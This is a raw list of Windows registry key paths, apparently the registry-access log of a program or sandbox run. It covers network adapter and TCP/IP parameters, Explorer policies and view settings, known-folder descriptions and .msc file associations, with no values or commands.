HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0009\Ndi\Service
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0009\Linkage\RootDevice
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0010\NetCfgInstanceID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0010\DriverDesc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0010\Description
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0010\Ndi\Service
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0010\Linkage\RootDevice
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0011\NetCfgInstanceID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0011\DriverDesc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0011\Description
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0011\Ndi\Service
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CLASS\{4D36E972-E325-11CE-BFC1-08002BE10318}\0011\Linkage\RootDevice
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Adapters\{CFE0B7CF-841E-4D51-AC07-A628D1182330}\IpConfig
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\EnableDHCP
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\EnableSecurityFilters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\TCPAllowedPorts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\UDPAllowedPorts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\RawIPAllowedProtocols
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\Interfaces\Tcpip_{C2D43895-0262-4873-A789-C2F96D24B693}\NetbiosOptions
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\EnableDNS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\EnableLMHOSTS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\ScopeID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\NameServer
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DatabasePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\UseZeroBroadcast
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\ArpAlwaysSourceRoute
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\ArpUseEtherSNAP
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DefaultTOS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DefaultTTL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\EnableDeadGWDetect
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\EnablePMTUBHDetect
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\EnablePMTUDiscovery
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\ForwardBufferMemory
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\IGMPLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\KeepAliveInterval
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\KeepAliveTime
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\MTU
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\NumForwardPackets
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\TcpMaxConnectRetransmissions
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\TcpMaxDataRetransmissions
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\TcpNumConnections
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\TcpUseRFC1122UrgentPointer
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\TcpWindowSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{CFE0B7CF-841E-4D51-AC07-A628D1182330}\EnableDHCP
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.msc\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mscfile\shellex\IconHandler\(Default)
HKEY_CURRENT_USER\Software\Classes\mscfile\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.msc\PerceivedType
HKEY_CURRENT_USER\Software\Classes\mscfile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.msc\Content Type
HKEY_CURRENT_USER\Software\Classes\mscfile\IsShortcut
HKEY_CURRENT_USER\Software\Classes\mscfile\AlwaysShowExt
HKEY_CURRENT_USER\Software\Classes\mscfile\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Desktop
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000\ProfileImagePath
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap\.msc
HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command\DelegateExecute
